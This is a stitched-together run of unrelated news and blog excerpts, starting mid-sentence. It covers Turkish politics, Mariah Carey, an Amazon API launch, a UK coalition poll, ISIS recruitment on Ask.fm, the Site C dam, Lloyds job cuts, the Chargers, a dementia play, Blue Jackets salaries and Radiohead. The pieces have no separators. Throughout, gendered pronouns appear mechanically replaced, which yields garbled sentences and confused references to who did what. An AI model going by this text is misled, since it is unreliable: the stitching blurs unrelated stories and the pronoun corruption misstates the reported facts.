laws and the constitution,” said Pervin Buldan, the deputy parliamentary group chair of the HDP.“He is trying to get the presidential system de facto settled. They put this into force after winning the presidential election,” Buldan added.Since being elected to their current post, Erdoğan has chaired a number of cabinet meetings, arguing that this is a constitutional right granted to any head of the Turkish state.Among the duties and powers relating to executive functions of the president, Article 104 of the constitution lists “presiding over the Council of Ministers or calling the Council of Ministers to meet under their or their chairpersonship whenever they or they deem it necessary.”
Mariah Carey's "new era" now has a name. Carey's July 23 album release has been dubbed The Art of Letting Go.
That album title was confirmed by the former "American Idol" judge's longtime producer Jermaine Dupri on Twitter late Monday night. The Art of Letting Go is MC's 11th studio album and their first since 2009's Memoirs of an Imperfect Angel. In addition to teaming up with Dupri, she's also worked with Bryan-Michael Cox (who produced 2012's "Triumphant (Get 'Em)"), Hit-Boy and The-Dream on the studio release.
Mariah Carey, July 23: The Art of Letting Go. The new album will be available for all the lambs on July 23 http://t.co/ofQ4kyMpuU — Jermaine Dupri (@jermainedupri) June 18, 2013
Carey kicked off their Letting Go era in May with the Miguel-assisted lead single, "#Beautiful," which currently sits at #15 on the Billboard Hot 100 chart.
When MTV News spoke to Miguel last month, they revealed why the twosome decided to include the social media-friendly hashtag in the song's title. "The hashtag in the title of this song is particularly fitting because the word that comes before 'beautiful' when I sing the chorus is an expletive that I can't say on air," they said, referring to the F-word they sing on song's hook. "But the hashtag is particularly fitting for that expletive, if you just kind of pay a little bit of attention."
...Melancholic moment letting go of something this personal to me yet I couldn't be more excited to give three years of my soul to the fans. — Mariah Carey (@MariahCarey) June 17, 2013
Weeks after they released the song, Carey announced they would be leaving "American Idol" after one season to put the focus back on their music. In addition to the Miguel collaboration, Carey has also teased potential appearances from "Idol" contestants Candice Glover, Kree Harrison and Angie Miller, as well as their daughter, Monroe, on the release.
"It's about making sure I have tons of good music, because at the end of the day, that's the most important thing," the singer explained in an interview with Billboard back in March. "Wherever we go with this project, I've tried to keep the soul and heart in it, with me obviously as the through-line."
Amazon has launched the Mobile Associates API. The API enables developers to monetize apps by offering physical and digital goods for sale through the Amazon marketplace and various Android stores. App owners can earn up to 6% in advertising fees for sales made through an owner's app. With the Mobile Associates API, Amazon aims to present a new way of monetizing apps by offering contextually relevant products for sale within any given app.
Mike George, vice president of Amazon Appstore, Games and Cloud Drive, commented:
"Developers now have the ability to create an even deeper connection between their app and the products customers value and purchase through Amazon.com. ... Imagine a developer of a nutrition and fitness app can now offer customers the ability to purchase vitamins, supplements and fitness gear within the app, directly from Amazon.com. It offers the customer a more relevant experience and provides the developer with a new source of revenue."
The API is currently available for Kindle Fire, Kindle Fire HD, and Android phones and tablets. Android developers can integrate the API as long as the app is available through the Amazon Mobile App Distribution Program. Developers from a handful of states cannot currently utilize the API because these states are not part of Amazon's Mobile App Distribution Program. For more information on requirements, visit the Mobile Associates site.
The API returns calls in a JSON data format. After initializing the app, developers can select what products to sell, or Amazon can run a search using the Amazon Product Advertising API. After basic setup is complete, apps can leverage Amazon's one-click purchase technology and Amazon handles all the back-end functions necessary to complete the transaction and deliver the product.
Amazon has already recruited a handful of developers to integrate the API. Days of Wonder and Alt12 Apps are two of the earlier adopters and have sung praises to the new API. Developers like Alt12 have already enjoyed great performance from the Product Advertising API, and the Mobile Associates API is an obvious next step.
Tory support for Ukip pact narrowly trails that for another deal with Lib Dems in event of hung parliament next year
Nearly a third of Conservative voters would prefer their party to form a coalition with Nigel Farage's party rather than any other, according to a survey.
The figure of 30% support for a coalition with Ukip compares with 31% who would favour a continuation of the current partnership with Liberal Democrats in the event of a hung parliament in 2015.
The survey by TNS UK found that the Liberal Democrats were the favoured party of coalition for supporters of both the Conservatives (31%) and Labour (32%) if either party does not win an outright majority.
Lib Dem voters preferred a coalition with the Tories rather than Labour by a margin of 36% to 26%, with 13% saying the party should go into opposition rather than joining another coalition.
Tory voters' enthusiasm for a linkup with Nigel Farage's Eurosceptic party was not matched by Ukip voters, 39% of whom said any MPs they secured next May should remain refuse to join a coalition at Westminster. Another 24% said they should enter government with the Conservatives, 13% with Labour and 8% with the Lib Dems.
Among Labour voters, 27% said they preferred opposition to coalition. Among Conservatives the figure was lower at 16%. More than a quarter of Labour supporters (29%) said they did not know what Ed Miliband should do if they find themselves in coalition negotiations after the election.
The poll gave Labour a seven-point lead on 36%, to the Tories' 29%, with Ukip on 19% and the Liberal Democrats trailing on 7%. But despite Ukip's apparent advantage over the Lib Dems, the first-past-the-post electoral system is likely to deny the party any more than a handful of MPs.
Michelle Harrison, an executive at TNS, said it was questionable whether a Tory-Ukip coalition could be considered a viable option. "While it is perhaps no surprise that a sizeable number of Conservative supporters favour a coalition with Ukip, the probability of that being a viable option at the next election is open to question," they said.
The poll suggested that Lib Dem support was much softer than that for the other parties. Of those saying they would vote Lib Dem in 2015, 47% said they might change their minds over the coming nine months, compared to 34% of Ukip backers, 24% of those supporting the Tories and 22% of Labour voters.
David Cameron's offer to renegotiate Britain's membership of the EU may not sway many voters, according to the poll. It was placed 10th out of a list of 10 possible policy priorities, with just 5% of those questioned naming it as their top priority, against 28% who said it was their lowest.
Topping the list were reducing unemployment, where the Tories were rated the party most likely to deliver, and investing more in healthcare, where Labour were most trusted.
Just over a third (34%) of those questioned said the economy had improved over the last 12 months, against 14% who said it had got worse. Looking ahead, just 29% expected it to get better over the coming year, while 59% said it would stay the same and 11% that it would decline.
• TNS Omnibus interviewed 1,191 adults in Great Britain between 15 and 17 July.
They say their favorite dessert is hot apple pie with ice cream on top. That they maintain their beard using shampoo, scented oils, and a comb. And that the day they fell in love was the day they embraced Islam.
These personal details are part of a Q&A with an ISIS recruiter on Ask.fm, a popular site where people can ask questions anonymously.
Their photo is cut off to conceal their identity, and beside it is the tagline "Im just like you" — common for ISIS recruiters on social networks like Facebook, Twitter and Instagram.
He's answered 299 questions from the community on Ask.fm, a lesser-known social network with 180 million users worldwide, many of them teenagers.
Other answers include: marriage status (single), where he's from (the United Kingdom) and more specific questions about fighting for ISIS and how their parents reacted when they converted.
They also encourage questioners to make "hijrah" or migrate to Syria. They field inquiries from a variety of people -- one who identifies as American, others curious about joining ISIS.
"He's a recruiter who may be putting themselves out there to some kid who may be trolling looking to see if they can cash in on this little Jihadi adventure that they all think they're on," said terrorism analyst Mubin Shaikh after looking at the Ask.fm posts.
Shaikh is a former recruiter for the Taliban who defected and now works to identify and expose potential threats.
ISIS is known to use popular social media for its recruiting and Shaikh shared many examples that have been taken down. On Instagram, there was a photo referencing the popular video game, Call of Duty. On Twitter, a tweet telling readers to "put the chicken wings down n come to Jihad bro."
Ask.fm says it's been removing such pages, though the one referenced in this story is available. "Right now, we are focused on being able to understand, spot and catch extremes of behavior, such as specific threats of violence (including terrorist threats) and other illegal activity," a spokesperson from Ask.fm said in a statement to CNNMoney.
A spokesperson from Instagram/Facebook says terrorist groups, like ISIS, are not permitted on the sites. "We do not allow any person or group to promote terrorism or share graphic content for sadistic purposes. This has long been our policy and something that we take very seriously," the spokesperson said.
The recruitment process goes beyond social networks. On Ask.fm, recruiters will sometimes respond to questions by offering their "kik" username so users can get in touch privately. Kik is a smartphone app for messaging.
There are also jihadi web forums where information is exchanged using advanced encryption software, according to Laith Alkhouri, director of Research at Flashpoint Global Partners, which analyzes terrorist communities.
Some use it to allow individuals to communicate directly with recruiting agents for ISIS. Those protected conversations cover everything from how to cross the border, what to bring, and what life as an ISIS member is like, said Alkhouri.
Shaikh says while companies are becoming more vigilant purging terrorist groups from their sites, damage is done.
"The recruitment has been going on for a long time," they say. "It will be on the decline but it might be a little too late because now the individuals are already there, they're part of the group, part of the threat and they're welcome to bring the threat back."
Dene Moore, The Canadian Press
VANCOUVER -- With a decision imminent on the Site C hydroelectric project in northeastern British Columbia, area First Nations have delivered a message to the provincial government: You can have the dam or you can have liquefied natural gas but you will not get both.
The $8-billion dam would lie in the heart of B.C.'s nascent LNG industry.
Chief Roland Willson of the West Moberly First Nation said their community has title to the Peace River valley under a century-old treaty, and a recent decision from the Supreme Court of Canada has bolstered their say in any industrial development on that land.
The band is not opposed to resource development, Willson said, but it has issued an ultimatum.
"I've said you can't have both," Willson said in an interview. "If you want to push Site C, we're not going to be in favour of any LNG projects, any of the pipeline projects up there. We don't want to be there but if that's the case, we don't have any other choice."
Willson was in Ottawa on Wednesday to deliver that message to the federal government. However, they and Chief Liz Logan of the Fort Nelson First Nation, Grand Chief Stewart Phillip of the Union of B.C. Indian Chiefs and Ghislaini Picard of the Assembly of First Nations did not meet with any federal government officials.
"We've come to Ottawa to try and talk to the decision-makers here and we've not been able to get in front of anybody," Willson told reporters.
The dam would be the third on the Peace River in B.C., flooding 5,550 hectares of land over an 83-kilometre stretch of valley. It would generate an estimated 1,100 megawatts of capacity, or enough to power the equivalent of 450,000 homes a year.
A report by a joint federal-provincial environmental assessment panel in May made no clear recommendation.
Energy Minister Bill Bennett said announcements are expected on environmental certificates from the federal government and the B.C. Environmental Assessment Office next month. If Site C is given the go-ahead, a final decision from the province could come in November.
"Clearly we would like to have at least some of the Treaty 8 First Nations, as many as possible, involved with the actual project -- their contracting firms getting business out of it, their people getting jobs out of it," Bennett said in a recent interview.
"Obviously, with no First Nation formally in support of the project at this time, we still have lots of work to do."
But there is a treaty in place, so the recent Supreme Court of Canada decision on land title may not have much bearing on this particular project, they said.
The Crown-owned utility, BC Hydro, has said it needs the dam to provide for future needs and meet the province's legislated clean energy targets.
Ken Boon, a rancher whose land will be underwater if the project proceeds, said they hope the West Moberly band can convince the province to find an alternative.
"I think if they had to choose between the two, they'd choose LNG," they said. "I don't think the government really has the appetite to get into a big litigation battle with First Nations over Site C."
Willson said the area cannot bear the environmental impact of both LNG and the dam.
"It's too much," they said. "We're already inundated with gas activity. When you look at that, well, they can't have both."
The Peace region is responsible already for 60 per cent of the province's resource revenue, they said.
"Yes there has to be development," Willson said. "But you can't continue to develop and push constitutionally protected treaty rights off to the side. They're at a point now where they've grossly crossed over those lines."
The announcement of 9000 job losses at Lloyds Banking Group must have come as a surprise to a lot of No voters. The bank took part in the government enticed fear explosion in the closing days of the referendum. A non violent act of terror designed to sow doubts in the minds of the large proportion of undecided voters. Although many were not fooled, sadly, it was a tactic that worked.
The pre-referendum announcement I can understand. A quarter of Lloyds shares are owned by the UK Government. Cameron used that power to coerce them into making a statement and they obliged by unveiling a contingency plan to relocate a plaque in the event of a Yes vote (a move that incidentally would have benefited an independent Scotland). The Press did the rest by reporting the announcement without any scrutiny and in the most alarmist way possible. The rest is history.
While I am not shocked by today's announcement it does highlight one of the issues that people who were voting Yes were trying to change. We were trying to move towards a society where people were valued and not just seen as commodities. Where companies are not just loyal to shareholders, but view themselves as an integral part of society and, as such, see the value of nurturing and investing in the people of that society.
There is something wrong with a banking system that takes billions of pounds of taxpayers money and then rewards the same taxpayers by making them unemployed. One of the reasons people voted Yes was to try to change the relationship between workers and corporate governance. We wanted to be more like Germany, where workers are represented on company boards and remuneration committees and are not kept in the dark about the the problems facing their employers. A system that leads to different outcomes as staff and governance work together to find solutions. A system that leads to more income equality, better standards of living and the retention of skilled employment.
The announcement today of 150 branch closures in favour of concentrating on creating online products is just double speak. What Lloyds are really saying is that they have no soul, compassion, social responsibility and imagination. In order to save a bit of cash, placate their shareholders in the short term and keep their hideously overblown corporate salaries they are going to punish those at the bottom. They will no doubt outsource most of the IT work. This is the Neo Liberal way of thinking. It is why we live in one of the most unfair developed countries.
There are other better models but there are no longer any leaders at the UK level who are ideologically susceptible to them. Still, news of a partially state owned company losing ten percent of its workforce can't be good news for George Osborne's recovery. One wonders if the matter was discussed in September when Cameron was frantically calling round their friends for favours?
Please comment below and enter an email address to receive notifications of new articles. Also, if you enjoy our content you can find out how you can help support the site by clicking here.
Privacy Policy Leave this field empty if you're human:
SAN DIEGO -- Mike McCoy's journey to earning the head coaching job of the San Diego Chargers began north of the border, playing quarterback for the CFL's Calgary Stampeders.
McCoy was a midseason replacement for Calgary in August 1999 after Dave Dickenson and Henry Burris suffered injuries. They learned on the run, completing 117 of 183 passes (64 percent) for 1,669 yards, 10 touchdowns and just two interceptions.
Rookie head coach Mike McCoy says they tap into their experience as a player to better prepare them as the Chargers' leader. Howard Smith/USA TODAY Sports
According to their college head coach at the University of Utah, Ron McBride, McCoy learned Calgary's entire playbook in a day.
"That's their whole thing -- he's intelligent," McBride said. "He doesn't get rattled. He's confident. They know what to do. Pressure doesn't bother him. He's the same way coaching. They don't get rattled. They have the same demeanor throughout the game."
McCoy led Calgary to the Grey Cup as an injury replacement, losing to Hamilton 32-21. Calgary wanted them back the following season, but at 28 years old, McCoy was ready to relinquish their dream of playing professional football.
Former San Francisco head coach George Seifert had taken a new job as head coach of the Carolina Panthers, offering McCoy a chance to work as an offensive assistant and quarterbacks coach for offensive coordinator Bill Musgrave.
"This was an opportunity of a lifetime," McCoy said. "I had always thought about it, and people had always talked to me about coaching. But to make that jump at such a young age and to work for a great coach like George Seifert and Jerry Richardson, as an owner, I couldn't pass it up."
McCoy quickly switched over to pursuing another dream -- becoming a head coach in the NFL.
Fast forward 14 years later and McCoy has reached their goal. One of eight new head coaches hired in 2013, McCoy is the only one still left in the postseason. That impressive fact is a testament to living up to their word when they first addressed the Chargers after being hired on Jan. 15, 2013.
On their way out the door after being relieved of their head-coaching duties, Norv Turner said San Diego had some serious work to do to once again become a playoff contender. But McCoy proved Turner wrong, leading the Chargers to the playoffs just a year later.
"From the very beginning in the first meeting, it was about us," safety Eric Weddle said. "It's not rebuilding. We're going to do things right, on and off the field. You're going to be a good person, and it's going to transfer over. And the ultimate goal is to win a Super Bowl.
"From the onset, that's what it's all been -- being confident and believing in each other. Every day he's preached it, consistency and belief, belief, belief -- that we can go in, play with anyone and beat anyone. And when you hear it every day, and the older guys transfer it down and push this team in the right direction, you're capable of doing anything."
McCoy, 41, instituted a dress code for game days, making players wear a suit and tie on road trips, giving birth to Philip Rivers' bolo ties. McCoy's a task master, paying attention to every detail of this team's schedule from sunup to sundown.
McCoy has a tough, no-nonsense attitude. They can be a bit paranoid about injury situations regarding their players, divulging as little information as possible on the status of their star performers heading into a game day.
But they also have built a bond and a trust with the Chargers by showing they care about them. And that nurturing attitude stems from McCoy's time as a fringe player in the NFL and a star player at the University of Utah.
McCoy went to training camp with Denver in 1995, signing with Green Bay's practice squad that year. They played for NFL Europe's Amsterdam Admirals, and also spent time in San Francisco and Philadelphia before concluding their career with Calgary in 1999.
In college, McCoy led the Utes to a 10-win season and a 1994 Freedom Bowl victory over the University of Arizona's "Desert Swarm" defense.
"Being a former player you can always relate back to the players," McCoy said. "That is one thing that helps me now. I was very fortunate to only have one injury and it was in college. You see the ups and downs, and the losses you take at certain times that are harder than others."
San Diego's success did not come early. The Chargers hit a season-low at 5-7 during the 2013 campaign, but tight end Antonio Gates said players finally started to believe in McCoy's philosophy and approach.
That belief, along with key players such as King Dunlap, Jarret Johnson and Melvin Ingram returning to the field, resulted in a five-game winning streak -- and the Chargers being eight quarters away from the Super Bowl.
"Mike is very detailed, and very understanding," Gates said. "I can't say enough about what they bring to this team. The leadership ability that they have, and the ability to keep us poised in tough times, to me all those messages they tried to put out, unfortunately it took time for us to comprehend and buy in. And now we're just at a point where that's happening for us offensively and defensively as a group."
Wow, what can I say... My Secret Santa did an amazing job! Having done gift exchanges before and being shafted, this definitely made up for it.
The first gift that arrived was skittles... Including blue ones! The legend proved true! They also tasted like watermelon... insert me gusta here
The second arrived one Saturday morning... A deadly cute black lanky cat! I need a name for them so leave a suggestion the comments! :D
The third arrived today, and I walked in from college to see that cat has already claimed it...! ;D It's a punk rock compilation of rarities from loaadddsss of bands, and being into bands like NOFX, Pennywise and the Ramones, I look forward to it! :D
BIIIGGG thank you to my SS! Having all these gifts show up over Christmas and New Year was great!
On a nearly cloudless, blue sky day in early May, Carolyn settled in for a leisurely lunch on the patio of a restaurant in Oakhurst. They were joined by their daughter, Emily, now a high school senior, whose small, slender frame and long dark hair could easily win them the role of their mother's younger self in a play or movie. She's a typical teen in some ways - joking about their grandmother smothering them with kisses on weekend mornings when she's still just trying to wake up, and barely containing a sigh when asked what they want to major in some day.
In other ways, though, she's remarkably grownup. She's clearly thought a lot about the toll dementia takes on the people they love, and they don't seek sympathy or shy away from asking tough questions. But they also know when to keep quiet and just listen, as when their mother talked about what it had been like working on "Blackberry Winter."
The five workshop shows couldn't have gone better, Carolyn said, sneaking a Tater Tot off Emily's plate. They'd made small tweaks after each performance, and Yockey was putting a final polish on the script, which was selected from 63 entries for The National New Play Network's annual new play showcase in Sarasota, Fla., next month. (For information on the play's progress, check www.outofhandtheater.com).
After months of preparation, finally getting to say Vivienne's lines onstage had proven cathartic. For so long, Carolyn had felt the need to make art from their own emotions and experiences, and she'd gotten to do that; meanwhile, the differences between them and their character had allowed them to stretch as an actor.
Still, they were glad to be done with it for now. Between performing "Blackberry Winter" and taking care of their mother, "Dementia got an awful lot of my time that week," Carolyn said with a chuckle.
After the first night's workshop performance, she'd taken a seat in the front row during the "talk back" session led by Fristoe, the director. When it came time to discuss the character of Vivienne, some audience members addressed Carolyn directly.
It was very real the way you said you and your mother are both changing.
You did a good job talking about how you and your sister got the diagnosis.
You seem really alone sometimes.
Each time Carolyn thanked the person for their feedback, but they also took pains to point out she's not Vivienne. The rest of the week, they sat in the back of the theater and quietly listened to the post-show comments.
"I didn't want it to be about me," they explained. "It was really important that the focus be on the play."
They know full well the power of drama to heal and to help start conversations about important subjects.
Increasingly, too, they understand it matters what you focus on.
“ "I'm watching them become the type of caregiver I'd want to become."
Emily was in the audience for one of the workshop performances. They like to see all of their mother's shows. This one, in particular, they couldn't miss.
"I knew a lot of the play had sprung from our experiences, and I wanted to know how it would be treated," they said. "And I knew there would be pieces of their (mother) that I wouldn't know otherwise."
They still aren't sure if some things Vivienne described had actually happened to Carolyn. But it was OK. They already had a pretty good idea who their mother was.
"I'm getting a rare opportunity of seeing my parents - my mother specifically - grow as a person," Emily said. "Watching them struggling with things and figure them out. And getting to be a better caregiver and person than I could imagine being.
"I'm watching them become the type of caregiver I'd want to become."
They both know it could happen someday. Given dementia's presence in their family, Emily knows there's a strong possibility that history will repeat itself again, and that she'll end up caring for their mother someday.
"At this point, I do not worry that I am going to get dementia," said Carolyn, who seems more concerned about the possible impact of being a caregiver on Emily as an only child. "I can't spend my energy on that. I focus on, 'I'm 53, I have at least 20 good years ahead of me, it's all made up of individual days I can focus on.'"
Just the previous day, in fact, she'd told their husband they were going to write a post for their blog (lifelongmetamorphoses.wordpress.com) titled, "Dementia, the Good Points." They and June had gone to a mall, but what they'd planned on doing involved too much walking. Instead, they'd plopped down next to each other on a porch swing and started slowly rocking.
Not so long ago, Carolyn would have kept pushing themselves and their mother forward, straining to fill each moment. Now they realized they were content to be rocking in place with their mother.
"We were sitting there, gently swinging, and they just relaxed," Carolyn said. "Her head was on my shoulder, I had my arm around them and all the tension went away. I felt needed and grateful.
"Grateful, right where I was."
STUDENTS
Across the country, colleges are hiking fees and slashing programs just to stay alive. On March 4, students protested at campuses in 30 states.
President Obama's plan for direct student lending would save $87 billion dollars going to subsidize the losses of Wall Street banks and give money to schools. But unless the Senate passes it at the same time they deal with health care, it won't pass for another year.
The Student Aid and Financial Responsibility Act was included in Senate reconciliation instructions for 2009, just like health care. It can pass the Senate with only 50 votes, but only if the House and Senate act now — at the same time they vote on health care.
Tell Nancy Pelosi and Harry Reid to pass student loan reform now.
While you were not following hockey this summer the Blue Jackets amassed one of the top 10 salary totals in the NHL for next season.
Now surely, the large cap hits of Marian Gaborik, Nathan Horton, and Sergei Bobrovksy play a big role in the salary increase, but it's not like those are league maximum deals, just above average. This is clearly a new age of management with John Davidson and Jaarmo Kekalainen in charge of finances, but how does such a small market team, with typical (which is to say poor) small market success justify the jump into the top 10 most spending teams? Well a lot of it comes back to dealing with the move to the East.
The Cost of Living
The Metropolitan Division will likely be the most challenging division in the NHL. There has long been a notion that the old Atlantic Division was the best in the league, each of the five teams have made the postseason within the last two years, and there is a powerful dichotomy between skill and speed (the Penguins and Islanders) and stout defense (Rangers and Devils), and that's to say nothing of the well-balanced Flyers. All five of those teams will be part of the Metropolitan along with the always dynamic Washington Capitals and the Carolina Hurricanes, who have fallen on hard times lately, but are still one of only 8 teams to win the Stanley Cup in the Salary Cap era. But let's not forget where the Blue Jackets came from: the Central Division was easily the best in the West and after the Jackets stormed to relevancy the line between the Atlantic and Central was rendered almost indeterminable.
But realistically the restructuring of the Metropolitan Division has made it stronger. The Central, with the loss of Columbus and Detroit and their replacement with teams like Dallas, Colorado, and Minnesota is not stronger. In the new four division system there will be no more cheap playoff berths: there are at least four really good teams in each division and as such the Jackets have no choice but to build a competitive team if they want to capitalize on their near breakthrough last year. The best way to build a strong team is to pay for talent, and that's what the Jackets have done for this coming season.
But did they really have to? There are some big market teams in the Metropolitan: the Rangers, Flyers, and Capitals all play in top 10 population markets, and although the Penguins aren't in a large market they are a merchandising machine, but that doesn't say much for the bankrupt Devils, the Hurricanes, or the barely surviving Islanders. If the Jackets were in the middle of spending here, then the “cost of living” would be well-deserved, they would be spending to keep up with the rest of the division, but consider these numbers, for the whole league the Flyers have spent the most, the Penguins third, the Jackets ninth, Rangers tenth, the Hurricanes are nineteenth, the Capitals are twenty-first, the Devils are twenty-fifth, and the Islanders rank dead last in actual salary.
Uh huh, well then, for all intents and purposes half of the division is essentially in the bottom third of spending for the league. And the Blue Jackets have spent the most in the division without going over the maximum cap, so they aren't really trying to merely keep up with their rivals, but in many ways be ahead of them. So then still, what are they doing?
Where the Money Goes
Overall the Blue Jackets have spent $62,283,808 of their $64,300,000 cap, and they have done so with an exceptionally even hand. Overall the team has spent the ninth most on forwards in the NHL, with division rivals Pittsburgh and Washington (no surprise there) both having invested more. The team has spent the seventh most on defense, but that's just fine given what this team will need to do to be successful in the Metro, that is to say, keep one of the really high scoring teams, either Pittsburgh, Washington, or the Islanders from scoring in order to beat them out of a playoff spot. The Jackets split the difference in the NHL with the 15th most money spent on goaltending.
All of this further reinforces that the Jackets are a good team. They haven't overspent their hand at any position and have clearly made a commitment to win now. The trouble is that the years of mismanagement and poor drafting before the reign of Davidson and Kekalainen will make this a challenging proposition if the team doesn't win soon. Spending this much money is fine when you get results and therefore sell tickets, this move could blow up in the face of the team if they should continue to struggle.
There is a calculated risk in climbing the salary cap totem pole for the Blue Jackets: they haven't yet proven that they can make the money required of a team that spends to the cap limit, but they have a lot going for them. They are moving to the Eastern Conference which means almost all of their games will start by 7:30, that should entice advertisers to invest more in commercials that will be seen by more fans. The fans have showed up: the team has topped 7,000 season ticket sales with nearly 1,000 new plans sold this year. For the first time the Jackets will actually have a full complement of games against their physically the nearest rivals: the Pittsburgh Penguins, and as a native of Pittsburgh, I can guarantee you that one way or another all of those games will be complete sellouts. The team will also get a significant boost because they will now have more games against the second and third closest logistical teams as well: Detroit and Buffalo.
Nothing would do more to put Columbus on the hockey map better than winning the inaugural season of the Metropolitan Division, and between Davidson's willingness to spend and Kekalainen's ability to make good moves, that isn't quite so impossible as it seems.
The NHL regular season schedule was released on Friday. Check out our partners at TiqIQ for the best deals on Columbus Blue Jackets tickets for all 2013-14 games.
Signing a new major-label contract “would have killed us straight off,” they added. “Money makes you numb, as M.I.A. wrote. I mean, it's tempting to have someone say to you, ‘You will never have to worry about money ever again,' but no matter how much money someone gives you — what, you're not going to spend it? You're not going to find stupid ways to get rid of it? Of course you are. It's like building roads and expecting there to be less traffic.”
The Eagles and Madonna, both with sales that dwarf Radiohead's, also abandoned major labels in 2007, as did songwriters as influential as Joni Mitchell and Paul McCartney, who moved to Hear Music, the independent label partly owned by Starbucks. Meanwhile Prince has followed their own wayward path, from one-album distribution deals through major labels to giving away CDs at concerts or, lately, bound into a British Sunday paper.
The second tipping point is the decisive migration of music to the Internet. Of course that has been anything but sudden. Music has been bouncing around online, sold or shared, since the days of dial-up, and bands like Smashing Pumpkins and Public Enemy gave away full albums online years ago. But the momentum of online music has been accelerating. Apple's iTunes became the third-largest music retailer in the United States this year. Amazon added MP3 downloads alongside physical album sales. Hip-hop mixtapes, singled out for copyright prosecution by record labels, disappeared from stores and street corners only to thrive online, where the likes of Lil Wayne, Cam'ron and Kanye West release their latest innovations.
And Radiohead was able to draw worldwide attention to “In Rainbows” with no more promotion than a modest 24-word announcement on its Web site on Oct. 1. To the band's glee, it could release its music almost immediately, without the months of lead time necessary to manufacture discs. Mr. Hufford said “In Rainbows” has been downloaded in places as far-flung — and largely unwired — as North Korea and Afghanistan.
On Nov. 9, as a kind of workaholic lark, Radiohead staged a free, thoroughly informal Webcast called “Thumbs Down,” with real-time performances of new songs and covers of Bjork and the Smiths, from its cluttered studio in Oxford. (Many clips are on YouTube.)
Yet Radiohead's online choices, band members said, were among the easier decisions made during the protracted recording process of “In Rainbows.” The band and its producer, Nigel Godrich, focused on 16 songs and worked them over in the studio, on the road and in the studio again, for well over two years of torturous rearranging and rewriting.
“We kept on ripping the guts out of it all the time and starting again,” the drummer Phil Selway said in Oxford.
Advertisement Continue reading the main story
The band chose 10 concise, tuneful songs for the album. In them Mr. Yorke sings about displacement, disorientation, memories and moving on. “Weird Fishes/Arpeggi” wonders “Why should I stay here?,” imagines decomposing underwater and being eaten by worms, then concludes, “Hit the bottom and escape.”
Throughout “In Rainbows” Mr. Yorke's lyrics can be mapped onto personal relationships, the state of the world or the state of the band.
Behind much of the album “was a sudden realization of the day-t0-day, tenuous nature of life,” Mr. Yorke said. “Most of the time I was really, really trying not to judge anything that was happening. I was trying to just, not exactly knock it out, but not trying to be clever. That's all.”
The Internet had already witnessed much of the gestation of “In Rainbows,” as Radiohead tested songs in public, knowing they would be bootlegged immediately. “The first time we ever did ‘All I Need,' boom! It was up on YouTube,” Mr. Yorke said. “I think it's fantastic. The instant you finish something, you're really excited about it, you're really proud of it, you hope someone's heard it, and then, by God, they have. It's O.K. because it's on a phone or a video recorder. It's a bogus recording, but the spirit of the song is there, and that's good. At that stage that's all you need to worry about.”
Photo
The band worried over other things. After releasing “Hail to the Thief” and touring the world, Radiohead took a year off. The members, all in their 30s, turned to raising families as they mulled over the future. Early in 2005 they began rehearsing together tentatively, although, Mr. Selway said, mentioning the word “album” was taboo for a year. They had a list of songs, most of which would appear two years later on “In Rainbows,” by September.
But as 2005 ended, Radiohead still had not regained its momentum. Mr. Yorke, a prolific songwriter, made their own album, “The Eraser,” working mostly alone with their computer and samples.
Mr. Godrich was busy recording Beck, so the band tried some sessions with Spike Stent, who had worked with Bjork, at the beginning of 2006. It was disappointed with the results. Then it decided that performing might put the songs into shape. It booked a summer tour in 2006, playing half a dozen new songs at every show. Soon, thanks to bootlegged recordings online, fans were clearly recognizing each one. After the tour Radiohead returned to the studio, only to decide that the songs weren't ready yet.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
“To be brutally honest,” the guitarist Ed O'Brien said over lunch at Shoreditch House in London, “the problem about playing these songs live is that we were bored with them. We played them 80 times live or so, and we'd rehearsed them to death. It just didn't happen when we got back into the studio initially.”
Once again the band began tinkering. “We have a song and we've got lots of different ways we can try it, but we don't know what's going to work, and that's why it still sort of feels a bit weirdly amateur,” Mr. Greenwood said. “You'd think by now we'd know what's going to work, and what's still frustrating, or kind of encouraging in a way, is that we don't know whether it's going to work on a laptop or whether it has to be a piano or. ...”
Advertisement Continue reading the main story
They half-smiled. “It's got so twisted,” they added. “What we've learned is that you can't repeat a method that you've already used for a song when it did work.”
The sound of “In Rainbows” often seems straightforward, almost like a live band; it is Radiohead's most gracefully melodic album in a decade. But Radiohead arrived at the music circuitously, and there's often more tucked into a track than is apparent at first. “Videotape,” with lyrics about recording a happy moment in a tape to be viewed posthumously, has a tolling piano and a beat so elusive that “we spent about a year in rehearsal on that song actually all trying to agree on where the one was,” Mr. Selway said. “Each of us, over the course of a year, we'd all lose it.”
The “Reckoner” that was part of the band's live sets sounds nothing like the “Reckoner” on the album, which includes the lyrics “in rainbows.” When the band returned from touring, it decided the song needed a second part, and then a third one; eventually it discarded the original. For “All I Need,” Mr. Greenwood said, they wanted to recapture the white noise generated by a band playing loudly in a room, when “all this chaos kicks up.” That sound never materializes in the more analytical confines of a studio. Their solution was to have a string section, and their own overdubbed violas, sustaining every note of the scale, blanketing the frequencies.
Mr. Yorke worked on many of the songs in the Rose and Crown. “I sit there, on the way in, because it's a really nice little table,” they said, pointing. “And then I get out my scraps of paper and I line them up. I need to put them into my book because they're just scraps of paper, and I'm going to lose them unless I do it. So am I writing here? Probably. I don't know yet. I'm just collating information. This is a nice, relaxing thing to do, and it also keeps your mind tuned in to the whole thing. And you see things you didn't know.”
The band and its managers are not releasing the download's sales figures or average price, and may never do so. “It's our linen,” Mr. Hufford said. “We don't want to wash it in public.” A statement from the band rejected estimates by the online survey company ComScore that during October about three-fifths of worldwide downloaders took the album free, while the rest paid an average of $6.
Factoring in free downloads, ComScore said the average price per download was $2.26. But it did not specify a total number of downloads, saying only that a “significant percentage” of the 1.2 million people who visited the Radiohead Web site, inrainbows.com, in October downloaded the album. Under a typical recording contract, a band receives royalties of about 15 percent of an album's wholesale price after expenses are recovered. Without middlemen, and with zero material costs for a download, $2.26 per album would work out to Radiohead's advantage — not to mention the worldwide publicity.
Both Mr. Hufford and the members of Radiohead said the strategy had been a success. “People made their choice to actually pay money,” Mr. Hufford said. “It's people saying, ‘We want to be part of this thing.' If it's good enough, people will put a penny in the pot.”
“This was a solution to a series of issues,” Mr. Hufford added. “I doubt it would work the same way ever again.”
Advertisement Continue reading the main story
